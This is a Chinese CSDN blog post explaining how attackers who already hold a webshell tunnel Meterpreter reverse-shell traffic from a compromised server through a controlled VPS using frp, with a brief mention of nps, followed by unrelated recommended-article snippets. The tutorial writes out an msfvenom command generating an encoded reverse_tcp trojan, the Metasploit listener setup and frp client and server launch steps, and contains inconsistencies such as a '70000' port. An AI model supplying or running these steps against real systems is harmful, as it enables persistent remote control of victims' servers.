Linux进程排查之代理隧道

最新推荐文章于 2024-06-21 13:42:17 发布
最新推荐文章于 2024-06-21 13:42:17 发布
阅读量1.1k 收藏 8
点赞数 33
分类专栏: 内网安全 文章标签: linux 运维 服务器 安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64481831/article/details/137506936
版权
本文介绍了代理隧道技术,特别是Frp隧道在远程Web服务器管理、不稳定连接修复和内网穿透中的应用。详细讲述了前提条件、代理过程以及利用Frp和Nps服务进行流量代理的方法,包括木马操作和配置步骤。
摘要由CSDN通过智能技术生成

目录

代理隧道

Frp隧道流量代理

使用场景

前提条件

代理过程

失陷主机或服务器

公网vps

frp服务

利用过程

Nps隧道流量代理

代理隧道

代理隧道是一种网络技术,通过在互联网上建立一个虚拟的隧道,将内部网络与外部网络相连,从而实现数据的传输和通信。原理是通过在网络传输中建立一个隧道,将通信流量从一种网络协议转换为另一种网络协议。

Frp隧道流量代理

使用场景

1、拿下了远程web服务器

2、webshell的连接不稳定,需要使用稳定的木马程序

3、远程服务器无法直接连接攻击者电脑(内网IP)

4、需要借助公网vps转发来自失陷服务器的木马流量

5、可以借助frp服务器(vps)和客户端(攻击者)建立隧道

前提条件

  • 攻击者拿下了webshell权限
  • 攻击者能够上传完整功能的木马到服务端
  • 生成一个木马,服务端执行了木马都会连接vps的frp端口发送流量
  • 对于公网vps,攻击者和受害者服务器都可以访问且攻击者可控

代理过程

失陷主机或服务器

  • 在执行攻击者上传的木马时会主动请求vps的4444端口进行通信,并发送流量

公网vps

  • 攻击者可控的
  • 攻击者和受害服务器都是可以访问的
  • vps使用7000端口(frp软件)进行监听,攻击者向vps发出请求建立隧道(只能由攻击者向vps发送请求,因为公网IP不能访问内网IP)
  • 受害主机运行攻击者上传的木马后会将流量通过4444端口传送至vps,然后vps把自己的4444端口的流量通过7000端口转发给攻击者(其实这样看来vps就是充当了一个媒介传递内网的流量给外网)

frp服务

frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。

  • 攻击端配置frpc客户端
  • vps7.7.7.7上配置frps服务端
  • frpc客户端和frps服务端连接后就建立了一个隧道,frps的4444端口会接收受害服务器的流量通过7000端口传递给frpc客户端的7777端口。

利用过程

1、在攻击机使用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.223 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

2、将木马上传到失陷服务器

3、攻击机启动msf,开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
run

4、攻击端开启frp客户端

#解压frp客户端压缩包
tar xf frp_0.33.0_linux_amd64.tar.gz

#查看客户端配置信息是否本地开放4444端口,并且设置frp服务端IP和连接端口70000
vim frpc.ini

#启动frp客户端(frpc)
sudo ./frpc -c frpc.ini

5、失陷主机开启frp服务端

# 查看frp服务端的配置文件,查看是否开放端口是7000。这里是Windows系统,可以直接打开,也可以使用命令
type frps.ini

#启动frp服务器
frps.exe -c frps.ini

6、失陷主机运行木马

7、攻击机监听获得shell。

Nps隧道流量代理

nps是一款轻量级、高性能、功能强大的内味穿透代理服务器。同frp类似,比较frp优点是nps有web后台管理页面,即它具有图形化管理界面,更方便配置。

由于和frp代理的原理、使用方式都差不多,这里就不详细讲。

参考链接:frp隧道(流量代理)_frp 隧道通信流量-CSDN博客

参考链接:【内网安全-隧道搭建】内网穿透_Nps配置、上线_nps 配置-CSDN博客

!!!!!!!!!!!!!!!!.
关注
专栏目录
Linux加持SSH隧道技术实现服务端口本地转发
这里是二进制空间安全博客,主要分享网络安全、信息安全和数据安全相关的技术文章。内容覆盖编程语言、基础知识、漏洞分析、攻防技巧、安全工具使用、最佳实践等安全技术主题。
09-01 426
在工作中,经常需要对公网云主机上运行的一系列服务进行维护,为了安全起见,通常对外开放的端口只有SSH(22端口)服务,虽然可以在运维的时候临时通过改变安全策略放行其它服务端口,但对于耗时较长的排查操作,长时间暴露敏感端口存在较大的安全风险。映射关系可以看作是隧道的收尾工程,隧道从云主机的22端口连接后,需要将其与远程主机上的本地服务端口建立连接,假设本地服务有个3306的数据库服务, 这样最终就打通了个人电脑5478端口和3306端口的连接,实现从本地访问防火墙之后的云主机服务。
有关Linux的资料整理大全
07-31
文件系统是Linux系统存储数据的方式,理解其结构和管理对于故障排查至关重要;而Shell脚本则是自动化任务执行的工具,通过编写脚本可以实现批处理操作。 【标签】"Linux"表明核心内容是关于Linux操作系统;...
Linux系统下隧道代理HTTP
weixin_73725158的博客
12-29 829
代理服务器是位于客户端和目标服务器之间的服务器,用于转发客户端的请求和接收服务器的响应。隧道代理是一种特殊类型的代理,它可以创建一个安全的加密通道,以保护客户端和服务器之间的通信。另外,对于安全性要求较高的场景,建议使用支持加密的隧道协议,如HTTPS。通过仔细阅读和理解相关文档,以及不断实践和调试,可以成功地建立一个安全的通信通道,保护客户端和服务器之间的数据传输。在Linux系统下配置隧道代理HTTP是一个涉及网络技术的话题,主要目的是在客户端和服务器之间建立一个安全的通信通道。(对于Squid)。
Linux系统管理员的HTTP隧道代理使用
最新发布
weixin_73725158的博客
06-21 276
HTTP隧道代理通过在客户端和服务器之间建立一个加密的HTTP隧道,将非HTTP协议的流量封装在HTTP协议中进行传输。同时,HTTP隧道代理的加密传输特性也保证了数据的安全性,防止了数据泄露和篡改。在Linux系统管理中,HTTP隧道代理是一个强大的工具,它允许系统管理员在复杂的网络环境中安全、高效地访问内部网络资源。作为Linux系统管理员,掌握HTTP隧道代理的使用技巧是非常必要的。通过合理配置和使用HTTP隧道代理,系统管理员可以更加安全、高效地访问内部网络资源,提升工作效率和安全性。
Linux通过SSH隧道代理访问内网主机
毛毛雨下的博客
12-16 1216
通过SSH隧道代理访问内网 由于不忍心家里的电脑一直闲着,所以打算把家里的电脑作为一台服务器供平时折腾用。家里的电脑通过路由器可以访问外网,但是一到公司就没辙了。我想在任何时间任何地点都可以连到家里的电脑,基于这种需求我开始琢磨怎么才能实现这种功能。原本是准备自己写一个socket代理程序部署到公网服务器上,虽然性能会差点,但也能将就着用,写到一半突然想起SSH貌似有这个功能(白白浪费了半天时间)。 首先需要一台有公网ip的服务器,如阿里云,腾讯云等(半年前5毛钱买的阿里云终于派上用场了)。 ![image
Linux SSH隧道技术(端口转发,socket代理
weixin_30846599的博客
05-08 515
动态转发(SOCKS5代理): 命令格式:ssh -D <local port> <SSH Server> ssh -fnND 0.0.0.0:20058 172.16.50.20 //f后台执行,必须配合n使用,N不打开远程shell,D绑定本地20058端口 -g Allow remote hosts to connect to forwarded ports. 在...
linux隧道反向代理
hyz792901324的博客
08-21 1030
文件位置 /etc/ssh/sshd_conf AllowAgentForwarding yes AllowTcpForwarding yes X11Forwarding yes UseLogin no GatewayPorts yes 配置完成后重启ssh service sshd restart 然后配置 xshell 的 属性 链接>ssh>隧道 ...
Linux常用命令大全及示例-超全.pdf
04-29
### Linux常用命令大全及示例解析 ...这些命令是每个Linux用户都应掌握的基础技能,无论是对于日常管理还是故障排查都非常有用。希望本文能够帮助读者更好地理解和应用这些命令,提升在Linux环境下的工作效率。
Linux网络代理与转发技术
# 1. 引言 ## 1.1 背景介绍 在当今的互联网时代,计算机网络已经成为人们生活和工作中不可或缺的一部分。网络代理和网络转发技术,作为网络领域中的...本文的目标是介绍Linux下的网络代理和转发技术及其应用场景,
linux-超级终端
01-09
3. **进程管理**:理解ps、pgrep、kill、pkill等命令,用于查看和管理运行中的进程。 4. **网络配置**:通过ifconfig、ip、route等命令来配置网络接口和路由,以及netstat来查看网络连接状态。 5. **用户和权限**...
Linux使用代理
十五年游戏主程转渗透之路
03-31 1106
proxychains
Linux操作系统配置代理服务器
m0_60981735的博客
06-30 2万+
Linux操作系统中使用代理IP
Linux上配置HTTP代理隧道的最佳实践
weixin_73725158的博客
03-05 367
例如,在Squid中,你可以启用“http_access allow all”来允许所有HTTP请求通过代理服务器。通常,你需要设置代理服务器的监听端口、访问控制列表(ACL)和缓存规则等。在Linux上配置HTTP代理隧道可以提供额外的安全性和灵活性,特别是在需要远程访问内部资源或绕过网络限制时。选择适合你需求的代理服务器,考虑其性能、稳定性和易用性。遵循这些最佳实践,你可以在Linux上成功配置HTTP代理隧道,提高网络的安全性和灵活性。将代理服务器的配置文档化,以便日后参考和故障排除。
Frp内网穿透
m0_50657187的博客
12-09 281
frp代理,实现外网访问内网服务
内网穿透工具——FRP
木东的博客
12-01 840
使用内网穿透工具——FRP,以及一台云服务器当做服务端,进行简单配置后即可远程访问 配置 FRP 服务端的前提条件是需要一台具有**公网 IP **的设备,得益于FRP是 Go 语言开发的,具有良好的跨平台特性。你可以在 Windows、Linux、MacOS、ARM等几乎任何可联网设备上部署。 FRP软件下载地址:https://github.com/fatedier/frp/releases 2|1架构 如图,在这里,客户端即被远程的机器,service我们使用3389远程控制...
Linux 设置代理
热门推荐
Jim~LoveQ的博客
07-10 4万+
一、为系统设置代理 编辑文件/etc/profile,增加如下两行 export http_proxy=http://proxy.com:8080/ export https_proxy=http://proxy.com:8080/ 二、为yum配置代理 在/etc/yum.conf后面添加以下内容: 如果代理不需要用户名密码认证: proxy=http://proxy.com:8080/ 如...
Linux使用xshell配合nginx代理隧道代理到本地端口
SpringHASh的博客
07-11 1167
location /zz/weixin/index { proxy_pass http://localhost:28098/zz/weixin/index; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; } 1.在nginx.conf中...
Linux squid代理服务
qq_43791975的博客
08-03 553
1.squid简介 定义:一个缓存服务器的守护进程 支持的代理协议:http、ftp、ssl、套接字 存储分类:磁盘>分区>目录>object 索引方式:hash tables 目录 每个digest的索引信息 digest tables 索引 不同分区对应的object大概说明 2.squid的工作模式 传统模式:此类工作模式为三种模式中最为简单的构成,对客户端配置不太友好,主要功能为加速内网用户的访问速度,减少出口流量。...
通过SSH隧道配置http代理
GeorgeGuo
04-21 1万+
如何配置SSH隧道,请参考使用SSH隧道通过海外服务器访问外部网络,本文在前一篇的基础上继续探索Window上Socket5到http的转换,从而实现通过HTTP代理使iphone、ipad都可以通过设置http代理,实现访问外部网络。 Privoxy转换socks5代理为Http代理 Socket5的代理不能直接接收http请求,必须添加一层转换,将socket5类型的代理转换成http...
Linux服务器僵尸进程排查与杀戮技巧
Linux系统管理中,处理僵尸进程是一项常见的任务,特别是在服务器环境中,这些未结束但已停止响应的进程可能占用系统资源,影响系统的正常运行。本文主要介绍了如何在Linux系统中寻找并杀掉僵尸进程。 首先,使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值